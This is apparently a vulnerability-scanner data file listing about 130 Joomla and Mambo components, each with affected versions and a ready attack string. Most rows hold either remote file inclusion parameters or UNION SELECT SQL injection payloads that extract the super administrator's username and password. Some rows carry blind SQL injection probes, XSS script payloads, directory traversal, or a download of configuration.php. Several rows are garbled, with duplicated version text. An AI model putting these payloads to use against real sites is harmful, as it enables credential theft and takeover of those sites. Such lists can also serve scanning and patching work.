Component: BSQ Site Stats 	XSS + SQL Injection Vulnerabilities Versions Affected: 1.8.0 <= |/components/com_bsq_sitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed.  2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  Successful exploitation requires that "magic_quotes_gpc" is disabled. 
Component: Madeira RFI Vulnerability  Versions Affected: Any|/components/com_madeira/img.php|/components/com_madeira/img.php?url=
Component: Mambo eMail Publisher    File Inclusion Vulnerability	Versions Affected: 1.2 <= |/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Component: Extended Registration     File Inclusion Vulnerability	Versions Affected: 4.1<= |/components/com_extended_registration/registration_detailed.inc.php|/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
Component: OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_sef/|N/A
Component: Multibanners  File Inclusion Vulnerability Versions Affected: Any|/components/com_multibanners/extadminmenus.class.php|/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Component: MoSpray   File Inclusion Vulnerability	Versions Affected: 1.8 RC1 <= |/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts/admin.php?basedir=
Component: MosMedia     File Inclusion Vulnerability    Versions Affected: 1.0.8 <= |/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Component: Mos Tree   File Inclusion Vulnerability   Versions Affected: 1.58 <= |/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability  Versions Affected: Any|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
Component: MambelFish RFI Vulnerability Versions Affected: 1.x <= |/components/com_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
Component: LMO File Inclusion Vulnerability Versions Affected: 1.0b2 <= |/components/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path=
Component: Link Directory   File Inclusion Vulnerability	  Versions Affected: Any|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Component: Letterman Versions Affected: 1.2.4 <= |/components/mod_letterman/|N/A
Component: JIM  File Inclusion Vulnerability Versions Affected: 1.0.1 <= |/components/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path=
Component: JD-Wiki File Inclusion Vulnerability Versions Affected: Any|/components/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
Component: Joomla Visites      Remote File Inclusion Vulnerability     Versions Affected: 1.1 RC2 <= |/components/com_joomla-visites/|/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
Component: JPad   SQL Injection Vulnerability  Versions Affected: 1.0<= |/components/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Filiale SQL Injection Vulnerability Versions Affected: 1.0.4 <= |/components/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Pony Gallery  SQL Injection Vulnerability	Versions Affected: 1.5 <= |/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Joomla Radio 5    File Inclusion Vulnerability 	Versions Affected: 5.0 <= |/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Component: Flash Slide Show Gallery 	  File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_slideshow/|/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
Component: zOOm Media Gallery  File Inclusion Vulnerability	Versions Affected: 2.5.1 RC4 <= |/components/com_zoom/classes/|/components/com_zoom/classes/database.php?mosConfig_absolute_path=
Component: VirtueMart (Joomla! E-Commerce)  Multiple XSS Vulnerabilities	Versions Affected: 1.0.11 <= |/components/com_virtuemart/|/index.php?option=com_contact&Itemid=1"><script>alert(1)</script>
Component: User Home Pages 2   File Inclusion Vulnerability  Versions Affected: 1.1.1 <= |/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=
Component: User Home Pages 1   File Inclusion Vulnerability 	Versions Affected: 1.1.1 <= |/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
Component: TaskHopper    File Inclusion Vulnerability    	Versions Affected: 1.1<= |/components/com_thopper/|/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Component: Security Images File Inclusion Vulnerability  Versions Affected: 3.0.5 <= |/components/com_securityimages/|/components/com_securityimages/lang.php?mosConfig_absolute_path=
Component: com_utchat File Inclusion Vulnerability Versions Affected: 0.2<= |/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php|/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=
Component: SimpleBoard  Script Insertion  File Inclusion Vulnerability	Versions Affected: Any|/components/com_simpleboard/|/components/com_simpleboard/file_upload.php?sbp=
Component: SMF Bridge  File Inclusion Vulnerability	Versions Affected: 1.1.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_path=
Component: RWCards   SQL Injection Vulnerability  Versions Affected: 2.4.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&category_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: RS Gallery2   SQL Injection Vulnerability	Versions Affected: 1.11.3<= |/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PollXT File Inclusion Vulnerability Versions Affected: 1.22.07<= |/components/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
Component: People Book   File Inclusion Vulnerability	Versions Affected: 1.1.5 <= |/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path=
Component: Phil-A-Form SQL Injection Vulnerability Versions Affected: 1.2.0.0 <= |/components/com_philaform/|/index.php?option=com_philaform&form_id=-1+UNION+SELECT+null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Per Forms File Inclusion Vulnerability Versions Affected: v1_beta <= |/components/com_performs/|/components/com_performs/performs.php?mosConfig_absolute_path=
Component: Webmaster Tips Portfolio    File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
Component: WmT Advanced Flash Gallery    File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_wmtgallery/|/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Component: Flash Panoramic View     File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_panoramic/|/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Component: MamboXChange VideoDB   File Inclusion Vulnerability  Versions Affected: 0.3en <= |/components/com_videodb/core/videodb.class.xml.php|/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
Component: HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions Affected: 1.5 <= |/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
Component: Calendar Versions Affected: 1.5.7 <= |/components/com_calendar/|N/A
Component: NFN Address Book Versions Affected: 0.4 <= |/components/com_nfn_addressbook/|N/A
Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/components/com_x-shop/|/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
Component: Tour de France Pool Versions Affected: 1.0.1 <= |/components/com_tour_toto/|N/A
Component: SWmenu   File Inclusion Vulnerability	 Versions Affected: 4.0 <= |/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Component: Nice Talk    SQL Injection Vulnerability	 Versions Affected: 0.9.3 <= |/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+SELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: BibTeX Blind SQL Injection Vulnerability Versions Affected: 1.3 <= |/components/com_jombib/|N/A
Component: RSfiles Remote File Download Vulnerability Versions Affected: 1.0.2 <= |/components/com_rsfiles/|/index.php?option=com_rsfiles&task=files.download&path=...index.php
Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/components/com_jreactions/|/components/com_jreactions/langset.php?comPath=
Component: mosListMessenger Versions Affected: 2.1.0 <= |/components/com_lm/|N/A
Component: Webring    File Inclusion Vulnerability    Versions Affected: 1.0<= |/components/com_webring/|/components/com_webring/admin.webring.docs.php?component_dir=
Component: Joomla! 12Pictures     File Inclusion Vulnerability  Versions Affected: 1.0<= |/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Component: FlashFun SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_flashfun/|/index.php?option=com_flash&act=view&Itemid=37&id=-13+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoRecruit SQL Injection Vulnerability Versions Affected: 1.4.0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MosReporter File Inclusion Vulnerability Versions Affected: 0.9.3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
Component: Joomla Flash Fun! File Inclusion Vulnerability Versions Affected: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Component: mosDirectory SQL Injection Vulnerability Versions Affected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewcat&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PU Arcade SQL Injection Vulnerability Versions Affected: 2.1.3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemid=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: RSGallery SQL Injection Vulnerability Versions Affected: 2.0 beta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: JUser File Inclusion Vulnerability Versions Affected: 1.0.14 and older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Component: Carousel Flash Image Gallery File Inclusion Vulnerability Versions Affected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Component: Color Lab File Inclusion Vulnerability Versions Affected: 1.0 and older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfig_live_site=
Component: Joomla Flash Uploader File Inclusion Vulnerability Versions Affected: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
Component: JContentSubscription File Inclusion Vulnerability Versions Affected: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Component: Mp3 Allopass File Inclusion Vulnerability Versions Affected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
Component: (xsstream-dm) SQL Injection Vulnerability Versions Affected: N/A|/components/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/**/union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: (biblestudy) SQL Injection Vulnerability Version Affected: N/A|/components/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_fq SQL Injection Vulnerability Versions Affected: N/A|/components/com_fq/|/index.php?option=com_fq&Itemid=999&listid=999/**/union/**/select/**/0,concat (username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_football (teamID) SQL Injection Vulnerability Versions Affected: N/A|/components/com_football/|/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat (username,0x3a,password),8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: jabode SQL injection Vulnerability Version Affected: N/A|/components/com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: netinvoice SQL injection Vulnerability Version Affected: N/A|/components/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: beamospetition SQL injection Vulnerability variant 1 Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=-5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: prayercenter  SQL injection Vulnerability Version Affected: N/A|/components/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_webhosting  Blind SQL Injection Vulnerability  Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+1=1::/index.php?option=com_webhosting&catid=1+and+1=2
Component: com_datsogallery  Blind SQL Injection Vulnerability  Version Affected: 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'),(1,if(ascii(substring((select password from #__users where username='admin'),0,1))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'),(select link from #__menu)))/*
Component: com_artist  SQL injection Vulnerability Version Affected: N/A|/components/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_mycontent Blind SQL Injection Vulnerability Version Affected: N/A|/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
Component: Joo!BB Blind SQL Injection Vulnerability Version Affected:  0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
Component: acctexp  Blind SQL Injection Vulnerability  Version Affected:  <= 0.12|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
Component: joomradio SQL Injection Vulnerability Version Affected:  <= 1.0 |/components/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_equotes  SQL injection  Vulnerability   Version Affected: 0.95 <= |/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_idoblog SQL Injection Vulnerability Version Affected: b24<= |/components/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1=1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: JooBlog Blind SQL Injection  Vulnerability  Version Affected: 0.1.1<= |/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
Component: jotloader Blind SQL Injection Vulnerability  Version Affected: 1.2.1.a<= |/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+1=1::/index.php?option=com_jotloader&cid=1+and+1=2
Component: EasyBook SQL Injection Vulnerability Version Affected: 1.1<= |/components/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: joomladate SQL injection   Vulnerability  Version Affected: N/A|/components/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/components/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: n-forms Blind SQL Injection Vulnerability Version Affected:  1.01 <= |/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+1=1::/index.php?option=com_n-forms&form_id=1+and+1=2
Component: yvcomment Blind SQL Injection Vulnerability Version Affected:  1.16  <= |/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=1::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=2
Component: News Portal Blind SQL Injection Vulnerability Version Affected:  1.0  <= |/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
Component: expshop SQL injection  Vulnerability  Version Affected: N/A|/components/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Xe webtv Blind SQL Injection Vulnerability  Version Affected:  N/A|/components/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=1::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=2
Component: com_versioning (id) SQL Injection Vulnerability     Version Affected:  1.0.2<= |/components/com_versioning /|/index.php?option=com_versioning&task=edit&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: mygallery SQL Injection Vulnerability  Version Affected:  N/A|/components/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Brightcode Weblinks SQL Injection Vulnerability Version Affected:  N/A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
Component: QuickTime VR SQL Injection  Vulnerability  Version Affected:  1.0  <= |/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: is_com  Multiple SQL Injection Vulnerability Version Affected:  1.0.1    <= |/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: altas multiple SQL Injection  Vulnerability Version Affected:  1.0    <= |/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_dbquery RFI Vulnerability Version Affected:  1.4.1.1    <= |/components/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
Component: ionFiles com_ionfiles  Arbitrary File Download Vulnerability    Version Affected:  4.4.2     <=  |/components/com_ionfiles/|/components/com_ionfiles/download.php?file=../../configuration.php&download=1 
Component: DT SQL Injection Vulnerability  Version Affected:    N/A|/components/com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138
Component: com_ezstore Blind SQL Injection Vulnerability  Version Affected:    N/A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2
Component: com_na_qforms (QF_msg) Cross Site Scripting (XSS) Vulnerability   Version Affected: N/A|/components/com_na_qforms/|/index.php?option=com_na_qforms&QF_url=error&QF_msg=%3E%3Cscript%3Ealert(1)%3C/script%3E
Component: Joomla Imagebrowser Directory Traversal Vulnerability Version Affected: 0.1.5 RC2<= |/components/remository/|/index.php?option=com_imagebrowser&folder=../../../../_non_
Component: com_hotspots SQL Injection Vulnerability Version Affected:    N/A|/components/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_joomtracker SQL Injection Vulnerability  Version Affected:    1.0.1<= |/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e6973747261746f72
Component: Ignite SQL Injection Vulnerability  Version Affected:    0.8.3<= |/components/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 
Component: Mad4Joomla Mailforms  SQL Injection Vulnerability  Version Affected:  N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Ownbiblio (com_ownbiblio) SQL Injection Vulnerability  Version Affected:  1.5.3<= |/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: Daily Message (com_dailymessage) SQL Injection Vulnerability  Version Affected:   1.0.3<= |/components/com_dailymessage/|/index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_ds-syndicate SQL Injection Vulnerability Version Affected: N/A|/components/com_ds-syndicate/|Request /index.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- and, if a file such as a feed or XML document is offered for download, download it and open it in a text editor to see information such as the username and password
Component: com_thyme  SQL Injection Vulnerability Version Affected:    1.0<= |/components/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Archaic Binary Gallery Directory Traversal Vulnerability Version Affected: 1.0<= |/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid=37&gallery=_NOT_EXIST
Component: Kbase (com_kbase) SQL Injection Vulnerability Version Affected: 1.2<= |/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Version Affected: 1.0<= |/administrator/components/com_treeg/|/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=
Component: VirtueMart Google Base Component (com_googlebase) Remote File Inclusion Vulnerability Version Affected: 1.1<= |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: com_ongumatimesheet20  Beta Remote File Inclusion Vulnerability   Version Affected:   4<= |/components/com_ongumatimesheet20/|/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=
Component: ProDesk  (com_pro_desk) Local File Inclusion Vulnerability    Version Affected:    1.2<= |/components/com_pro_desk/|/index.php?option=com_pro_desk&include_file=
Component: Clickheat - Heatmap stats for Joomla! Multiple Remote File Inclusion Vulnerabilities    Version Affected:    1.0.1<= |/components/com_clickheat/|/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability   Version Affected:   2.6 <= |/components/com_dadamail/|/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Recly!Competitions Component Multiple Remote File Inclusion Vulnerability   Version Affected:   1.0.0  <= |/components/com_competitions/|/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=
Component: People Book File Inclusion Vulnerability Versions Affected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
